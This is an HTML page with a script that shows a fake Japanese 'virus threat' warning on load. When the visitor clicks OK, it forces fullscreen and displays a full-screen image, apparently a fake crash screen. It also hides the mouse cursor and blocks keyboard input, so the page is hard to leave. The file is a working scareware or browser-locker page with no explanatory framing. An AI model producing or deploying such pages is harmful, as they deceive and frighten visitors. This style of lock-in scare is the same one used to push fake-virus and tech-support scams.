<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Fullscreen and Disable Keyboard</title>
	<style>
		body {
			display: flex;
			justify-content: center;
			align-items: center;
			height: 100vh;
			margin: 0;
			background-color: #f0f0f0;
			font-family: Arial, sans-serif;
		}

		h1 {
			color: #333;
		}

		.fullscreen-bg {
			position: fixed;
			top: 0;
			left: 0;
			width: 100vw;
			height: 100vh;
			z-index: -1;
		}

		.fullscreen-bg img {
			width: 100%;
			height: 100%;
			object-fit: cover;
		}

		.hidden {
			opacity: 0;
			pointer-events: none;
			transition: opacity 0.3s ease;
		}

	</style>
</head>

<body>
	<main class="hidden">
		<div class="fullscreen-bg">
			<img src="https://wallpaperaccess.com/full/96300.png" alt="BS">
		</div>
	</main>

	<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
	<script>

		document.addEventListener("keydown", function (event) {
			console.log(event.key);
			if (event.key === "Escape") {
				return false;
			}
			if (event.keyCode === 27) {
				return false;
			}
			event.preventDefault();
			return false;
		});

		const elem = document.documentElement;
		function openFullscreen() {
			if (elem.requestFullscreen) {
				elem.requestFullscreen();
			} else if (elem.mozRequestFullScreen) { // Firefox
				elem.mozRequestFullScreen();
			} else if (elem.webkitRequestFullscreen) { // Chrome, Safari, Opera
				elem.webkitRequestFullscreen();
			} else if (elem.msRequestFullscreen) { // IE/Edge
				elem.msRequestFullscreen();
			}
			const mainContent = document.querySelector("main");
			mainContent.classList.remove("hidden");
			document.querySelector("body").style.cursor = "none";

		}

		window.addEventListener("load", function () {

			function showConfirmation() {
				Swal.fire({
					title: 'ウイルス脅威',
					text: "潜在的な脅威が検出され，その項目は一時停止されました。ファイルを削除して危険な状態を回避してください。",
					icon: 'warning',
					showCancelButton: false,
					confirmButtonText: 'OK',
					cancelButtonText: 'いいえ',
				}).then((result) => {
					if (result.isConfirmed) {
						openFullscreen();
					} else {
						openFullscreen();
					}
				});
			}
			showConfirmation();
		});
	</script>
</body>

</html>
